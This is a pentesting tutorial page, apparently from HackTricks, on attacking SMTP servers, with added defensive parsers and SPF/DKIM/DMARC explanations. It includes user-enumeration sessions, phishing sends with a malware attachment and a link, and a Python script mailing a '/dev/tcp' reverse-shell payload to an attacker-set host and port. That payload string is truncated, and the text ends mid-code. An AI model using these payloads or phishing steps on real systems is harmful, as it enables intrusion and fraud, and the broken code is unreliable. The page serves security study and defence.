2024-02-10 17:52:19 +00:00

25,465,587 - Pentesting SMTP/s

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Instantly available setup for vulnerability assessment & penetration testing. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

{% embed url="https://pentest-tools.com/" %}

Basic Information

The Simple Mail Transfer Protocol (SMTP) is a protocol utilized within the TCP/IP suite for the sending and receiving of e-mail. Due to its limitations in queuing messages at the recipient's end, SMTP is often employed alongside either POP3 or IMAP. These additional protocols enable users to store messages on a server mailbox and to periodically download them.

In practice, it is common for e-mail programs to employ SMTP for sending e-mails, while utilizing POP3 or IMAP for receiving them. On systems based on Unix, sendmail stands out as the SMTP server most frequently used for e-mail purposes. The commercial package known as Sendmail encompasses a POP3 server. Furthermore, Microsoft Exchange provides an SMTP server and offers the option to include POP3 support.

Default port: 25, 465 (ssl), 587 (ssl)

```
PORT   STATE SERVICE REASON  VERSION
25/tcp open  smtp    syn-ack Microsoft ESMTP 6.0.3790.3959
```

EMAIL Headers

If you can make the victim send you an email (for example via a contact form on the web page), do it: the mail headers can reveal the victim's internal topology.

You can also get an email from an SMTP server by sending it a message to a non-existent address, because the server will return an NDN (non-delivery notification) to the sender. Make sure you send the email from an allowed address (check the SPF policy) and that you can receive NDN messages.

You should also try sending different contents, because the headers may contain more interesting information, such as: X-Virus-Scanned: by av.domain.com
You should send the EICAR test file.
Detecting the AV may allow you to exploit known vulnerabilities.

Basic actions

Banner Grabbing/Basic connection

SMTP:

```bash
nc -vn <IP> 25
```

SMTPS:

SMTPS (Secure SMTP) is a secure version of the Simple Mail Transfer Protocol (SMTP) that uses SSL/TLS encryption to protect the communication between the email client and the mail server. This encryption ensures that the email content and credentials are transmitted securely over the network.

To perform a penetration test on SMTPS, you can follow these steps:

  1. Information Gathering: Gather information about the target SMTPS server, such as the IP address, domain name, and email addresses associated with it.

  2. Port Scanning: Use a port scanning tool like Nmap to identify open ports on the target server. Look for port 465, which is commonly used for SMTPS.

  3. Banner Grabbing: Use a tool like Telnet or Netcat to connect to the SMTPS server and retrieve the banner information. This can provide valuable information about the server software and version.

  4. User Enumeration: Enumerate valid email addresses on the target server using techniques like SMTP VRFY and RCPT TO commands. This can help identify potential targets for further attacks.

  5. Brute-Force Attacks: Use a tool like Hydra or Medusa to perform brute-force attacks against the SMTPS server, attempting to guess valid usernames and passwords. This can be done using a wordlist or by generating passwords based on common patterns.

  6. Email Spoofing: Attempt to send spoofed emails from the target SMTPS server by manipulating the email headers. This can be used to impersonate legitimate users or send malicious content.

  7. Email Relay: Test if the SMTPS server allows email relaying, which can be used to send emails to external domains without authentication. This can be exploited for spamming or phishing purposes.

  8. Vulnerability Scanning: Use a vulnerability scanning tool like OpenVAS or Nessus to identify any known vulnerabilities in the SMTPS server software. This can help identify potential entry points for exploitation.

  9. Exploitation: Exploit any identified vulnerabilities to gain unauthorized access to the SMTPS server or compromise email accounts. This can include techniques like command injection, buffer overflow, or SQL injection.

  10. Post-Exploitation: Once access is gained, perform post-exploitation activities such as exfiltrating sensitive data, escalating privileges, or pivoting to other systems on the network.

Remember to always obtain proper authorization before conducting any penetration testing activities and to follow ethical hacking guidelines.

```bash
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
```

Finding MX servers of an organisation

To find the MX servers of an organization, you can use the following methods:

Method 1: Using nslookup

You can use the nslookup command to query the DNS records of the organization's domain. Open a terminal and run the following command:

```bash
nslookup -type=MX <domain>
```

Replace <domain> with the organization's domain name. This command will return the MX records associated with the domain, which will indicate the organization's mail servers.

Method 2: Using dig

Another option is to use the dig command, which provides more detailed information. Open a terminal and run the following command:

```bash
dig <domain> MX
```

Replace <domain> with the organization's domain name. This command will display the MX records associated with the domain.

Method 3: Online Tools

There are several online tools that can help you find an organisation's MX servers, such as MXToolbox and DNSstuff. Enter the organisation's domain name into the tool and it will return the MX records.


```bash
dig +short mx google.com
```


```bash
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```

NTLM Auth - Information disclosure

If the server supports NTLM auth (Windows) you can obtain sensitive info (versions). More info here.


```shell-session
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
```

Or you can automate this with the nmap plugin smtp-ntlm-info.nse.
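As an added example (not part of the original page), here is a Python decoder for the NTLM CHALLENGE_MESSAGE the server returned in the session above. It shows what a server that offers `AUTH NTLM` discloses to any unauthenticated client before a single credential is sent: the target name, the NetBIOS/DNS names in the AV_PAIR list and the OS version, which is the same information `smtp-ntlm-info.nse` reports. The base64 blob is the one from the session above; field offsets follow MS-NLMP.

```python
import base64
import struct
from datetime import datetime, timedelta, timezone

# The CHALLENGE_MESSAGE (NTLM Type 2) returned by the server in the telnet session above
CHALLENGE_B64 = (
    "TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABC"
    "AAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMA"
    "MAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEA"
    "AAAA"
)

NEGOTIATE_TARGET_INFO = 0x00800000   # TargetInfo (AV_PAIR list) is present
NEGOTIATE_VERSION = 0x02000000       # Version field is present

AV_NAMES = {
    0x0001: "NetBIOS computer name",
    0x0002: "NetBIOS domain name",
    0x0003: "DNS computer name",
    0x0004: "DNS domain name",
    0x0005: "DNS tree name",
}

def filetime_to_iso(ticks):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an ISO timestamp."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return (epoch + timedelta(microseconds=ticks // 10)).isoformat()

def parse_ntlm_challenge(b64):
    """Extract the server-identifying fields from an NTLM CHALLENGE_MESSAGE (MS-NLMP 2.2.1.2)."""
    data = base64.b64decode(b64)
    if data[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", data, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    name_len, _, name_off = struct.unpack_from("<HHI", data, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", data, 20)[0]                   # NegotiateFlags
    info = {
        "target_name": data[name_off:name_off + name_len].decode("utf-16-le"),
        "flags": flags,
        "os_version": None,
        "av_pairs": {},
    }
    if flags & NEGOTIATE_VERSION:
        major, minor, build = struct.unpack_from("<BBH", data, 48)  # Version field
        info["os_version"] = "%d.%d build %d" % (major, minor, build)
    if flags & NEGOTIATE_TARGET_INFO:
        ti_len, _, ti_off = struct.unpack_from("<HHI", data, 40)    # TargetInfoFields
        pos = ti_off
        while pos + 4 <= ti_off + ti_len:
            av_id, av_len = struct.unpack_from("<HH", data, pos)
            pos += 4
            if av_id == 0:                                           # MsvAvEOL ends the list
                break
            value = data[pos:pos + av_len]
            pos += av_len
            if av_id == 0x0007:                                      # MsvAvTimestamp
                info["av_pairs"]["Timestamp"] = filetime_to_iso(struct.unpack("<Q", value)[0])
            elif av_id in AV_NAMES:
                info["av_pairs"][AV_NAMES[av_id]] = value.decode("utf-16-le")
            else:
                info["av_pairs"]["AvId 0x%04x" % av_id] = value.hex()
    return info

if __name__ == "__main__":
    for key, value in parse_ntlm_challenge(CHALLENGE_B64).items():
        print("%-12s %s" % (key, value))
```

For this challenge the decoder yields the host name IIS01 and Windows version 6.3 build 9600, which is what an attacker learns from an exposed NTLM authentication offer.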

Internal server name - Information disclosure

Some SMTP servers auto-complete a sender's address when the "MAIL FROM" command is issued without a full address, disclosing their internal name:

```shell-session
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
250-TURN
250-SIZE 52428800
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK
```

Sniffing

Check whether you can sniff any passwords from the packets sent to port 25.

Auth bruteforce

Username Bruteforce Enumeration

Authentication is not always needed

RCPT TO


```shell-session
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
MAIL FROM:example@domain.com
250 2.1.0 example@domain.com... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
```

VRFY

VRFY is a command used in the Simple Mail Transfer Protocol (SMTP) to verify the existence of a specific email address. It is commonly used by email servers to check if an email address is valid before accepting incoming messages.

The VRFY command works by sending a request to the SMTP server with the email address as the argument. The server then responds with a status code indicating whether the address is valid or not.

In a penetration testing scenario, the VRFY command can be used to gather information about the email addresses associated with a target organization. By sending VRFY requests to the SMTP server, an attacker can determine valid email addresses, which can be useful for social engineering attacks or targeted phishing campaigns.

It is important to note that not all SMTP servers support the VRFY command, as it can be a security risk. Therefore, its availability may vary depending on the target system.

To use the VRFY command, you can use the following syntax:

```
VRFY <email_address>
```

Replace <email_address> with the email address you want to verify.

Keep in mind that using the VRFY command without proper authorization is considered unethical and may be illegal. Always ensure you have proper permission and follow ethical guidelines when conducting penetration testing activities.

```shell-session
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
VRFY root
250 Super-User root@myhost
VRFY blah
550 blah... User unknown
```

EXPN

The EXPN command is used to expand a mailing list on an SMTP server. It can be used to gather information about the users or aliases configured on the server. By sending the EXPN command followed by a mailing list name, the server will respond with the expanded list of recipients.

This command can be useful during a penetration test to gather information about the email addresses or aliases configured on the target SMTP server. It can help in identifying potential targets for further attacks, such as social engineering or phishing.

However, it's important to note that not all SMTP servers support the EXPN command, as it can be a security risk. Some servers may have it disabled or restricted to prevent information leakage. Therefore, it's necessary to check if the server allows the EXPN command before attempting to use it.

To use the EXPN command, you can use a telnet client to connect to the SMTP server on port 25. Once connected, you can issue the EXPN command followed by the mailing list name. The server will respond with the expanded list of recipients, if available.

Example:

```shell-session
telnet mail.example.com 25
220 mail.example.com ESMTP Postfix
EXPN mailinglist@example.com
250 2.1.5 mailinglist@example.com
```

In this example, the EXPN command is used to expand the "mailinglist@example.com" mailing list. The server responds with the expanded list of recipients, indicating that the mailing list exists.

It's important to use the EXPN command responsibly and only on systems that you have permission to test. Unauthorized use of this command can be considered a violation of privacy and may have legal consequences. Always ensure that you have proper authorization before performing any penetration testing activities.

```shell-session
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 ed.williams@myhost
EXPN sshd
250 2.1.5 sshd privsep sshd@myhost
```

Automatic tools

There are several automatic tools available for SMTP pentesting that can help streamline the process and make it more efficient. These tools can assist in various tasks such as enumeration, vulnerability scanning, and exploitation. Here are some popular automatic tools used in SMTP pentesting:

  • Nmap: Nmap is a powerful network scanning tool that can be used to discover open SMTP ports and identify potential vulnerabilities.

  • Metasploit: Metasploit is a widely used framework for developing and executing exploits. It includes modules specifically designed for SMTP pentesting.

  • OpenVAS: OpenVAS is an open-source vulnerability scanner that can be used to identify security weaknesses in SMTP servers.

  • SMTP User Enumeration: This tool is specifically designed to enumerate valid users on an SMTP server. It can be used to gather information for further exploitation.

  • SMTP User Brute-Force: This tool is used to perform brute-force attacks on SMTP servers, attempting to guess valid usernames and passwords.

  • SMTP User Enum: SMTP User Enum is a tool that can be used to enumerate valid users on an SMTP server. It can be helpful in identifying potential targets for further exploitation.

  • SMTP User VRFY: SMTP User VRFY is a tool that can be used to verify the existence of a user on an SMTP server. It can be used to gather information for further exploitation.

  • SMTP User Fuzzer: This tool is used to fuzz SMTP servers by sending a large number of random requests. It can help identify potential vulnerabilities in the server's handling of user input.

These tools can be used individually or in combination to perform a comprehensive SMTP pentest. It is important to note that while these tools can automate certain tasks, manual testing and verification are still necessary to ensure accurate results.

```bash
Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
```
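From the defender's side, the RCPT TO / VRFY / EXPN enumeration described in this section leaves a recognisable trace: a burst of "User unknown" rejects for many distinct recipients from a single client. As an added example (not from the original page), the following Python detector runs that logic over a constructed log excerpt written in the style of Postfix smtpd reject lines; the hosts, addresses and IPs are invented.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed log excerpt in the style of Postfix smtpd reject lines (hosts, IPs and addresses invented)
SAMPLE_LOG = """\
Sep 15 12:10:01 mx postfix/smtpd[2211]: NOQUEUE: reject: RCPT from mail.partner.example[203.0.113.7]: 550 5.1.1 <jon.doe@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@partner.example> to=<jon.doe@example.com> proto=ESMTP helo=<mail.partner.example>
Sep 15 12:13:28 mx postfix/smtpd[2290]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 550 5.1.1 <test@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<test@example.com> proto=SMTP helo=<x>
Sep 15 12:13:29 mx postfix/smtpd[2290]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 550 5.1.1 <admin@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<admin@example.com> proto=SMTP helo=<x>
Sep 15 12:13:30 mx postfix/smtpd[2290]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 550 5.1.1 <root@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<root@example.com> proto=SMTP helo=<x>
Sep 15 12:13:31 mx postfix/smtpd[2290]: 7F3A1C2D9: client=unknown[198.51.100.9]
Sep 15 12:13:32 mx postfix/smtpd[2290]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 550 5.1.1 <sales@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<sales@example.com> proto=SMTP helo=<x>
Sep 15 12:13:33 mx postfix/smtpd[2290]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 550 5.1.1 <info@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<info@example.com> proto=SMTP helo=<x>
Sep 15 12:40:15 mx postfix/smtpd[2402]: NOQUEUE: reject: RCPT from mail.partner.example[203.0.113.7]: 550 5.1.1 <jane.doe@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@partner.example> to=<jane.doe@example.com> proto=ESMTP helo=<mail.partner.example>
"""

# Matches only "User unknown" RCPT rejects; other smtpd lines (accepted mail, TLS, disconnects) are ignored
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: NOQUEUE: reject: RCPT from "
    r"\S+\[(?P<ip>[\d.]+)\]: 550 5\.1\.1 <(?P<rcpt>[^>]+)>: Recipient address rejected: User unknown"
)

def detect_enumeration(lines, threshold=5, window_s=60):
    """Flag clients whose 'User unknown' rejects reach `threshold` within any `window_s` window.
    Returns {client_ip: sorted list of distinct recipients probed}."""
    recent = defaultdict(deque)      # per-client timestamps of recent rejects (sliding window)
    probed = defaultdict(set)        # per-client distinct unknown recipients
    flagged = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")   # year-less syslog stamp
        ip = m.group("ip")
        probed[ip].add(m.group("rcpt"))
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:             # drop rejects outside the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = sorted(probed[ip])
    return flagged

if __name__ == "__main__":
    for ip, recipients in detect_enumeration(SAMPLE_LOG.splitlines()).items():
        print("possible user enumeration from %s: %d unknown recipients %s" % (ip, len(recipients), recipients))
```

The two typo-style rejects from 203.0.113.7 half an hour apart stay below the threshold, while the scanning client is flagged on its fifth reject within the window.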


DSN Reports

Delivery Status Notification Reports: If you send an email to an invalid address at an organisation, the organisation will notify you that the address was invalid by sending a mail back to you. The headers of the returned email may contain sensitive information (such as the IP addresses of the mail services that handled the report, or anti-virus software details).

Commands

Sending an Email from linux console

```shell-session
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

<phishing message>
```

```bash
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
```

Sending an Email with Python

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys

lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587

# create message object instance
msg = MIMEMultipart()

# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"

# payload
message = ("& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))

print("[*] Payload is generated : %s" % message)

msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250:
    print("[-]Connection Error")
    sys.exit()

server.starttls()

# Uncomment if log-in with authentication
# server.login(msg['From'], password)

server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()

print("[***]successfully sent email to %s:" % (msg['To']))
```

## Mail Spoofing Countermeasures

Because SMTP messages are easy to spoof, organizations rely on **SPF**, **DKIM**, and **DMARC** to prevent unauthorized email from being sent on their behalf.

A **complete guide to these countermeasures** is made available at [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).

### SPF

{% hint style="danger" %}
SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\
Moreover, to reuse previous SPF records it's quite common to find something like `"v=spf1 include:_spf.google.com ~all"`
{% endhint %}

**Sender Policy Framework** (SPF) is a mechanism that enables Mail Transfer Agents (MTAs) to verify whether a host sending an email is authorized by querying a list of authorized mail servers defined by the organizations. This list, which specifies IP addresses/ranges, domains, and other entities **authorized to send email on behalf of a domain name**, includes various "**Mechanisms**" in the SPF record.

#### Mechanisms

From [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):

| Mechanism | Description                                                                                                                                                                                                                                                                                                                         |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL       | Matches always; used for a default result like `-all` for all IPs not matched by prior mechanisms.                                                                                                                                                                                                                                  |
| A         | If the domain name has an address record (A or AAAA) that can be resolved to the sender's address, it will match.                                                                                                                                                                                                                   |
| IP4       | If the sender is in a given IPv4 address range, match.                                                                                                                                                                                                                                                                              |
| IP6       | If the sender is in a given IPv6 address range, match.                                                                                                                                                                                                                                                                              |
| MX        | If the domain name has an MX record resolving to the sender's address, it will match (i.e. the mail comes from one of the domain's incoming mail servers).                                                                                                                                                                          |
| PTR       | If the domain name (PTR record) for the client's address is in the given domain and that domain name resolves to the client's address (forward-confirmed reverse DNS), match. This mechanism is discouraged and should be avoided, if possible.                                                                                     |
| EXISTS    | If the given domain name resolves to any address, match (no matter the address it resolves to). This is rarely used. Along with the SPF macro language it offers more complex matches like DNSBL-queries.                                                                                                                           |
| INCLUDE   | References the policy of another domain. If that domain's policy passes, this mechanism passes. However, if the included policy fails, processing continues. To fully delegate to another domain's policy, the redirect extension must be used.                                                                                     |
| REDIRECT  | <p>A redirect is a pointer to another domain name that hosts an SPF policy; it allows multiple domains to share the same SPF policy. It is useful when working with a large number of domains that share the same email infrastructure.</p><p>The SPF policy of the domain indicated in the redirect mechanism will be used.</p> |

It's also possible to identify **Qualifiers** that indicate **what should be done if a mechanism is matched**. By default, the **qualifier "+"** is used (so if any mechanism is matched, that means it's allowed).\
You will usually find **at the end of each SPF policy** something like **\~all** or **-all**. This indicates that **if the sender doesn't match any SPF mechanism, the email should be tagged as untrusted (\~) or rejected (-).**

#### Qualifiers

Each mechanism within the policy may be prefixed by one of four qualifiers to define the intended result:

* **`+`**: Corresponds to a PASS result. By default, mechanisms assume this qualifier, making `+mx` equivalent to `mx`.
* **`?`**: Represents a NEUTRAL result, treated similarly to NONE (no specific policy).
* **`~`**: Denotes SOFTFAIL, serving as a middle ground between NEUTRAL and FAIL. Emails meeting this result are typically accepted but marked accordingly.
* **`-`**: Indicates FAIL, suggesting that the email should be outright rejected.

In the upcoming example, the **SPF policy of google.com** is illustrated. Note the inclusion of SPF policies from different domains within the first SPF policy:
```shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
```

Traditionally it was possible to spoof any domain name that didn't have a correct (or any) SPF record. Nowadays, an email coming from a domain without a valid SPF record is probably going to be rejected or marked as untrusted automatically.

To check the SPF of a domain you can use online tools like: https://www.kitterman.com/spf/validate.html

### DKIM (DomainKeys Identified Mail)

DKIM is utilized to sign outbound emails, allowing their validation by external Mail Transfer Agents (MTAs) through the retrieval of the domain's public key from DNS. This public key is located in a domain's TXT record. To access this key, one must know both the selector and the domain name.

For instance, to request the key, the domain name and selector are essential. These can be found in the mail header DKIM-Signature, e.g., d=gmail.com;s=20120113.

A command to fetch this information might look like:

```bash
dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
```

### DMARC (Domain-based Message Authentication, Reporting & Conformance)

DMARC enhances email security by building on SPF and DKIM protocols. It outlines policies that guide mail servers in the handling of emails from a specific domain, including how to deal with authentication failures and where to send reports about email processing actions.

To obtain the DMARC record, you need to query the `_dmarc` subdomain of the domain:

```bash
# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
```

#### DMARC tags

| Tag Name | Purpose                                        | Sample                            |
| -------- | ---------------------------------------------- | --------------------------------- |
| v        | Protocol version                               | v=DMARC1                          |
| pct      | Percentage of messages subjected to filtering  | pct=20                            |
| ruf      | Reporting URI for forensic reports             | ruf=mailto:authfail@example.com   |
| rua      | Reporting URI of aggregate reports             | rua=mailto:aggrep@example.com     |
| p        | Policy for organizational domain               | p=quarantine                      |
| sp       | Policy for subdomains of the OD                | sp=reject                         |
| adkim    | Alignment mode for DKIM                        | adkim=s                           |
| aspf     | Alignment mode for SPF                         | aspf=r                            |
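The DKIM and DMARC lookups above meet in the receiver's DMARC check: the `d=`/`s=` tags of a `DKIM-Signature` name the key record, and the DMARC tags decide alignment and disposition. The following Python is an added example (not code from the page or from any MTA); the `DKIM-Signature` value is constructed, the DMARC records are the three returned by `dig` above, and `org_domain` is a simplified stand-in for the Public Suffix List.

```python
def parse_tags(value):
    """Split a 'tag=value; tag=value' list (a DKIM-Signature header value or a
    DMARC TXT record) into a dict; whitespace around tags is ignored."""
    tags = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            tags[key.strip()] = val.strip()
    return tags


def dkim_key_query_name(dkim_signature):
    """Name of the TXT record holding the signer's public key:
    <selector>._domainkey.<domain>, built from the s= and d= tags."""
    tags = parse_tags(dkim_signature)
    return f"{tags['s']}._domainkey.{tags['d']}"


def org_domain(domain):
    """Crude organizational domain (last two labels). Real receivers use the
    Public Suffix List so that names such as demon.co.uk are handled correctly."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(auth_domain, from_domain, mode):
    """DMARC identifier alignment: strict ('s') needs an exact match,
    relaxed ('r', the default) only the same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def dmarc_disposition(record, from_domain, spf_domain=None, spf_result="none",
                      dkim_domain=None, dkim_result="none", is_subdomain=False):
    """Return 'pass' if SPF or DKIM passed with an identifier aligned to the
    From: domain; otherwise the p= policy (sp= for subdomains): none,
    quarantine or reject. pct= is the receiver's sampling rate, not applied here."""
    tags = parse_tags(record)
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record")
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain, tags.get("aspf", "r"))
    dkim_ok = dkim_result == "pass" and aligned(dkim_domain, from_domain, tags.get("adkim", "r"))
    if spf_ok or dkim_ok:
        return "pass"
    if is_subdomain and "sp" in tags:
        return tags["sp"]
    return tags.get("p", "none")


# Constructed DKIM-Signature value (bh= and b= shortened to dummies) and the
# three DMARC records returned by the dig queries above.
DKIM_SIG = "v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=from:to:subject; bh=Zm9v=; b=YmFy="
DMARC_FACEBOOK = "v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"
DMARC_GOOGLE = "v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"
DMARC_BING = "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

if __name__ == "__main__":
    print(dkim_key_query_name(DKIM_SIG))
    print(dmarc_disposition(DMARC_FACEBOOK, "facebook.com", spf_domain="mail.facebook.com", spf_result="pass"))
```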

#### What about Subdomains?

From here.
You need to have separate SPF records for each subdomain you wish to send mail from.
The following was originally posted on openspf.org, which used to be a great resource for this kind of thing.

The Demon Question: What about subdomains?

If I get mail from pielovers.demon.co.uk, and there's no SPF data for pielovers, should I go back one level and test SPF for demon.co.uk? No. Each subdomain at Demon is a different customer, and each customer might have their own policy. It wouldn't make sense for Demon's policy to apply to all its customers by default; if Demon wants to do that, it can set up SPF records for each subdomain.

So the advice to SPF publishers is this: you should add an SPF record for each subdomain or hostname that has an A or MX record.

Sites with wildcard A or MX records should also have a wildcard SPF record, of the form: `* IN TXT "v=spf1 -all"`

This makes sense - a subdomain may very well be in a different geographical location and have a very different SPF definition.
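As an added example (not from the page) that ties together the mechanisms, the qualifiers and the subdomain question above: a small SPF evaluator in Python that follows `include:` and `redirect=`, applies `+`/`-`/`~`/`?`, and returns `none` rather than consulting the parent domain when a host has no record. DNS is replaced by an in-memory dict holding the google.com chain from the `dig` output plus two constructed domains, `strict.example` and `alias.example`.

```python
import ipaddress

# Constructed offline stand-in for DNS TXT lookups. The google.com chain is
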